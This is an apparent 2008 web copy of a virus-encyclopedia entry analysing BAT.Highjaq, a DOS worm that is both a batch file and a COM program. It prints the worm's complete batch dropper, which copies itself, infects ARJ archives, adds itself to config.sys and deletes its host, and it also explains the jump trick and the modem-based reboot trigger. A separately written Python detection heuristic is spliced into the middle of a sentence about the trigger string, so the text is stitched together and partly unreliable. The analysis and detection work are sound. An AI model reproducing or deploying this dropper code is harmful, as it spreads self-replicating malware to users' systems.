Tuesday, 7 October 2008       

BAT.Highjaq.140 Spyware/Adware Definition


Name: BAT.Highjaq.140
Category: Viruses
Description:
BAT.Highjaq.1400

This is a non-dangerous virus-worm that places itself in BAT files and device drivers. The virus has no memory-resident (TSR) code that infects files, but when it is executed as a device driver it stays memory resident and hooks INT 21h for its "AreYouHere?" call and INT 8 for the trigger routine.
The virus code has two parts. The first part is text data; it is executed when the virus runs as a BAT file. The second part is binary data; it takes control when the virus is executed as a COM file or as a device driver.
The text part of the code looks as follows (when this data is executed as binary code, the labels also pass control onward):
::pFqD
@ctty nul
copy/b %0.bat+%0 c:\q.com
dir *.arj/s/b|c:\q.com/i
:qlpj
if errorlevel 1 goto qWpU
ren c:\q.com UMKQYGWK.5KA
echo INSTALLHIGH=C:\UMKQYGWK.5KA>>c:\config.sys
:qWpU
for %%a in (%0 %0.bat) do if exist %%a set q=%%a
del c:\q.com
ctty con
@del %q%

When executed as a BAT file, the virus copies itself to the file C:\Q.COM (third line). That is the COM dropper used to infect other files. The virus takes into account that the infected file may have been started either by its bare name or by its full name with the extension, so %0 may or may not carry ".BAT"; to solve that problem the virus uses the command:
COPY %0.BAT+%0

to copy its code.
Then the virus runs the DIR command to find all ARJ archives in the directory tree of the current disk and passes their names to the Q.COM file (fourth line). Q.COM returns an errorlevel that indicates whether the TSR code of the virus is in memory. If memory is not infected (i.e. the virus has not been loaded as a device driver), the virus renames its COM dropper to UMKQYGWK.5KA and writes the string:
INSTALLHIGH=C:\UMKQYGWK.5KA

to the end of the C:\CONFIG.SYS file (7th and 8th lines). As a result, the virus adds itself to the list of system device drivers. Then the virus deletes the host file and the C:\Q.COM file.
When executed as a COM file (see the third line), the virus reads the names of ARJ archives from standard input, checks each archive and appends a block of data to its end. That block contains the virus code, named in the archive as /WINSTART.BAT. The virus does not compress its code when saving it to the archive, but keeps it as "stored" data.
The binary code of the virus takes control from the file header after several jumps:
0100 3A 3A    CMP  BH,[BP+SI]   ; text: ::pFqD
0102 70 46    JO   Jmp_a
0104 71 44    JNO  Jmp_a
....
0149 3A       DB   3Ah          ; text: :qlpj
014A          Jmp_a:
014A 71 6C    JNO  Jmp_b
014C 70 6A    JO   Jmp_b
....
01B7 3A       DB   3Ah          ; text: :qWpU
01B8          Jmp_b:
01B8 71 57    JNO  Main_Code
01BA 70 55    JO   Main_Code
....
0211          Main_Code:
....

The text strings are executed by the processor as real assembler instructions, and the JO/JNO trick passes control to the binary virus code in either case, since exactly one of the two complementary conditional jumps is always taken. That code detects whether the virus is being executed as a device driver (no arguments on the command line) or as a COM file (the /i argument; see the BAT code) and switches control to one of two routines.
When executed as a device driver, the virus hooks INT 8 and INT 21h and stays memory resident. Because the virus file does not have the format of a system driver (there is no FFFFFFFFh at the beginning of the file), the virus cannot keep itself in memory through a device request and uses the DOS Keep call (INT 21h, AH=31h) instead.
By hooking INT 8 the virus runs its internal counters and, if the computer is not running under Windows 3.x, reboots the system some time later. By hooking INT 21h the virus intercepts the "AreYouHere?" call (AX=FEFEh; the virus returns SI=1994h) and also terminates the GetFileAttributes call (INT 21h, AX=4300h) if the file name begins with "/W". I see no reason for that trick; maybe the virus protects its droppers in ARJ archives in some way? (they are stored there under the name /WINSTART.BAT)
When executed as a device driver, or as a COM file without arguments, the virus also gets the host file name and sets its attributes to Hidden and ReadOnly.
The virus also checks the system COM ports, reading the Scratch Register and the Line Status Register of each port. If reading the Scratch Register returns the 'Q' character (51h), the virus launches the trigger routine. If the DataSetReady and ClearToSend bits are set in the Line Status Register, the virus writes the port number to the DOS kernel at some fixed address. I see no reason for that action.
When the trigger routine runs, it clears the screen, initializes the ports, and writes the string
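As an added example (not code from the page or from the virus author), the following Python decodes batch labels as the x86 JO/JNO pairs described above and checks whether they chain into binary code appended after the text, a usable heuristic for spotting BAT/COM polyglot droppers of this kind. The BAT bytes are a reconstruction: the page's listing lost its backslashes and exact spacing, so "copy /b" spacing, CRLF line endings and a CR-only last line are assumed so that the label addresses match the disassembly above (0x14A, 0x1B8, 0x211).

```python
import struct

# Constructed input: the text part of the virus's BAT code as listed on the page.
# The listing lost its backslashes and exact spacing, so "copy /b", CRLF line
# endings and a CR-only last line are ASSUMED; with them the label addresses
# match the page's disassembly (0x14A, 0x1B8, 0x211).
BAT_TEXT = (
    b"::pFqD\r\n"
    b"@ctty nul\r\n"
    b"copy /b %0.bat+%0 c:\\q.com\r\n"
    b"dir *.arj/s/b|c:\\q.com/i\r\n"
    b":qlpj\r\n"
    b"if errorlevel 1 goto qWpU\r\n"
    b"ren c:\\q.com UMKQYGWK.5KA\r\n"
    b"echo INSTALLHIGH=C:\\UMKQYGWK.5KA>>c:\\config.sys\r\n"
    b":qWpU\r\n"
    b"for %%a in (%0 %0.bat) do if exist %%a set q=%%a\r\n"
    b"del c:\\q.com\r\n"
    b"ctty con\r\n"
    b"@del %q%\r"
)

JO, JNO = 0x70, 0x71  # x86 short conditional jumps, one signed rel8 operand each

def decode_label_jumps(data, base=0x100):
    """Return [(jump_addr, target)] for labels whose first four letters decode to a JO/JNO pair with one common target."""
    found, pos = [], 0
    for line in data.splitlines(keepends=True):  # bytes: splits on \r, \n, \r\n
        if line.startswith(b":"):
            body = line.lstrip(b":")
            addr = base + pos + (len(line) - len(body))  # address of first letter
            if len(body) >= 4 and {body[0], body[2]} == {JO, JNO}:
                t1 = addr + 2 + struct.unpack("b", body[1:2])[0]  # signed rel8
                t2 = addr + 4 + struct.unpack("b", body[3:4])[0]
                if t1 == t2:  # both branches of the pair land on the same spot
                    found.append((addr, t1))
        pos += len(line)
    return found

def is_bat_com_polyglot(data, base=0x100):
    """Heuristic: jumps chain label to label and the last one lands at or past the end of the text, i.e. in appended binary code."""
    jumps = decode_label_jumps(data, base)
    if not jumps:
        return False
    for (_, target), (next_addr, _) in zip(jumps, jumps[1:]):
        if target != next_addr:
            return False
    return jumps[-1][1] >= base + len(data)
```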
ATL0M0A

to the COM port using INT 14h calls (followed by the bytes 0Dh, 0Ah). Modem gurus can describe more accurately how the modem will answer, but as far as I can see the virus mutes the modem and turns off its speaker. Then, in the same way, the virus outputs to the COM port the line:
HIGHJAQ on COMx:38400,N,8,1

where COMx is the number of the port being accessed. Then the virus hooks INT 8 and executes the C:\COMMAND.COM file with the parameters:
C: COM1 /E:1024/P/F

The hooked INT 8 points to another handler (not the one described above). That handler checks the modem's Carrier Detect bit and reboots the computer if a carrier is detected.

